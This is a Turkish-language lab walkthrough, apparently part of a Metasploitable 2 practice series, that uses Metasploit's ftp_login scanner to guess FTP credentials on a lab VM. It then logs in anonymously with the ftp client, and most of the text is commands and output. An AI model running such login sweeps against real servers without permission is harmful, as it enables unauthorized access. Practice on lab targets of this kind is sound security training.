Metasploitable 2 Exploit ftp
Exploit # 8 : FTP
Nmap ve nessus taramasında 21/ftp portunun açık olduğu görülünce metasploitte ftp_login modülüyle kullanıcı adı ve parola için bir deneme yapılabilir. Metasploitin kendi sözlükleri yeterli olabilir.
msf> search ftp login
Matching Modules
================
Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/dos/windows/ftp/guildftp_cwdlist 2008-10-12 00:00:00 UTC normal Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
auxiliary/dos/windows/ftp/titan626_site 2008-10-14 00:00:00 UTC normal Titan FTP Server 6.26.630 SITE WHO DoS
auxiliary/dos/windows/ftp/winftp230_nlst 2008-09-26 00:00:00 UTC normal WinFTP 2.3.0 NLST Denial of Service
auxiliary/dos/windows/ftp/xmeasy560_nlst 2008-10-13 00:00:00 UTC normal XM Easy Personal FTP Server 5.6.0 NLST DoS
auxiliary/dos/windows/ftp/xmeasy570_nlst 2009-03-27 00:00:00 UTC normal XM Easy Personal FTP Server 5.7.0 NLST DoS
auxiliary/scanner/ftp/ftp_login normal FTP Authentication Scanner
exploit/windows/ftp/freefloatftp_wbem 2012-12-07 00:00:00 UTC excellent FreeFloat FTP Server Arbitrary File Upload
exploit/windows/ftp/warftpd_165_pass 1998-03-19 00:00:00 UTC average War-FTPD 1.65 Password Overflow
post/windows/gather/credentials/ftpx normal Windows Gather FTP Explorer (FTPX) Credential Extraction
post/windows/gather/credentials/smartftp normal Windows Gather SmartFTP Saved Password Extraction
msf auxiliary(rlogin_login) > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
Module options (auxiliary/scanner/ftp/ftp_login):
Name Current Setting Required Description
—- ————— ——– ———–
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RECORD_GUEST false no Record anonymous/guest logins to the database
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ftp_login) > set RHOSTS 172.16.52.133
RHOSTS => 172.16.52.133
msf auxiliary(ftp_login) > exploit
[*] 172.16.52.133:21 – Starting FTP login sweep
[*] Connecting to FTP server 172.16.52.133:21…
[*] Connected to target FTP server.
[*] 172.16.52.133:21 – FTP Banner: ‘220 (vsFTPd 2.3.4)\x0d\x0a’
[*] 172.16.52.133:21 FTP – Attempting FTP login for ‘anonymous’:’User@’
[+] 172.16.52.133:21 – Successful FTP login for ‘anonymous’:’User@’
[*] 172.16.52.133:21 – User ‘anonymous’ has READ access
[*] Successful authentication with read access on 172.16.52.133 will not be reported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_login) >
Tarama sonucunda kullanıcı adı:anonymous parola:user@ yakalandı. Bununla konsoldan giriş yapılabilir. Yada tarayıcı üzerinden ftp://172.16.52.133 ile ulaşılabilir.FTP sunucusuna bağlanarak yetki kazanmak için bazı bilgiler elde edilebilir.
#ftp 172.16.52.133
Connected to 172.16.52.133.
220 (vsFTPd 2.3.4)
Name (172.16.52.133:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lat
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
226 Directory send OK
